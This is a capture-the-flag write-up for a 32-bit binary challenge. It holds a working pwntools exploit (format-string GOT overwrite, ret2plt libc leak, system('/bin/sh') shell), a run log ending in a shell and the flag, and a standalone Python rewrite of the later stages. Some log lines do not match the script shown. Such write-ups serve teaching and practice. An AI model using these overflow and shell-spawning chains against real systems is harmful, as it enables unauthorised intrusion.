from pwn import *

e = ELF('./hello')
libc = ELF('./libc.so.6')
#p = process('./hello')
p = remote('chall.csivit.com', 30046)

# Stage 1: format string write. Point free@got at _start so every run of main()
# restarts the program instead of exiting, giving us more than one shot.
print(p.recvuntil(b'name?\n'))
payload = fmtstr_payload(1, {e.got['free']: e.symbols['_start']})
p.sendline(payload)

# Stage 2: stack overflow, ret2plt. Call printf(printf@got) to leak printf's libc
# address, then return to _start once more.
print(p.recvuntil(b'name?\n'))
payload = b'A' * 136                    # 136 bytes reach the saved return address
payload += p32(e.symbols['printf'])     # printf@plt
payload += p32(e.symbols['_start'])     # where printf returns to
payload += p32(e.got['printf'])         # argument: the GOT slot to print
p.sendline(payload)
print(p.recvline())
ret = u32(p.recvline()[:4])             # first 4 raw bytes of the reply = printf's libc address

# Stage 3: compute the libc base and call system("/bin/sh").
libc_base_addr = ret - libc.symbols['printf']
system_addr = libc.symbols['system'] + libc_base_addr
binsh_addr = next(libc.search(b"/bin/sh")) + libc_base_addr
payload = b'A' * 136
payload += p32(system_addr)
payload += b'AAAA'                      # dummy return address for system()
payload += p32(binsh_addr)
p.sendline(payload)
p.interactive()
```
```
$ python solve.py
[*] '/home/kali/csi_ctf_2020/Smash/hello'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[*] '/home/kali/csi_ctf_2020/Smash/libc.so.6'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to chall.csivit.com on port 30046: Done
What's your name?

Hello, % 9 n\x17\x04\x14\x04\x15\x04!
What's your name?

Hello, system: 0xf7e0b956 /bin/sh: 0xf7f2a111
What's your name?

Hello, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`\x84\x04�\x10\x04!
ret: 0xf7e1a030
[*] Switching to interactive mode
Hello, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP\xb9��AAAA\x0b��!
$ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ ls
ctf.xinetd  flag.txt  hello  start.sh
$ cat flag.txt
csictf{5up32_m4210_5m45h_8202}
```
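Stages 2 and 3 of the Smash exploit (the i386 ret2plt leak, the libc base arithmetic and the system() call) without pwntools, as an added example that is not part of the original write-up. The 136-byte offset is from the script above; the `LIBC_OFFSETS` values and the addresses in the `__main__` block are constructed placeholders, not the challenge's libc.so.6 or hello binary, and the plausibility check on the base is the sanity test I would add before firing the final stage.

```python
import struct


def p32(v):
    return struct.pack("<I", v)


def u32(b):
    return struct.unpack("<I", b[:4])[0]


BUF_OFF = 136   # filler that reaches the saved return address in hello (from the write-up)

# Constructed libc offsets; with the real file use libc.symbols['printf'],
# libc.symbols['system'] and next(libc.search(b"/bin/sh")).
LIBC_OFFSETS = {"printf": 0x51030, "system": 0x3d200, "/bin/sh": 0x17e0af}


def build_leak_chain(printf_plt, return_to, printf_got, buf_off=BUF_OFF):
    """i386 ret2plt: [filler][printf@plt][address printf returns to][arg0 = printf@got].
    printf() prints the bytes stored at printf@got, i.e. printf's resolved libc address."""
    return b"A" * buf_off + p32(printf_plt) + p32(return_to) + p32(printf_got)


def build_system_chain(system_addr, binsh_addr, buf_off=BUF_OFF):
    """[filler][system][dummy return address][arg0 = "/bin/sh"]"""
    return b"A" * buf_off + p32(system_addr) + b"AAAA" + p32(binsh_addr)


def parse_leak(reply):
    """The leaked pointer is the first 4 raw bytes printf writes, little-endian."""
    return u32(reply)


def is_plausible_base(base):
    """Shared objects are mapped on page boundaries; anything else means the wrong libc
    build or a misparsed leak, and the next stage would just crash the service."""
    return base > 0 and (base & 0xfff) == 0


def resolve(leaked_printf, offsets=LIBC_OFFSETS):
    base = leaked_printf - offsets["printf"]
    if not is_plausible_base(base):
        raise ValueError("libc base 0x%x is not page-aligned" % base)
    return {
        "base": base,
        "system": base + offsets["system"],
        "/bin/sh": base + offsets["/bin/sh"],
    }


if __name__ == "__main__":
    # Constructed addresses standing in for e.symbols['printf'], e.symbols['_start'], e.got['printf']
    leak_stage = build_leak_chain(0x8049050, 0x80490a0, 0x804c010)
    print("leak chain: %d bytes" % len(leak_stage))
    reply = b"\x30\x10\xe5\xf7" + b"\xff\xff\xff\xff"   # constructed reply to the leak stage
    addrs = resolve(parse_leak(reply))
    for k, v in addrs.items():
        print("%-8s 0x%08x" % (k, v))
    print("system chain: %d bytes" % len(build_system_chain(addrs["system"], addrs["/bin/sh"])))
```

Because every run returns to _start rather than exiting (stage 1 of the script above), a wrong guess costs one more "What's your name?" prompt instead of the connection, which is why the alignment check is worth doing before sending the system() chain.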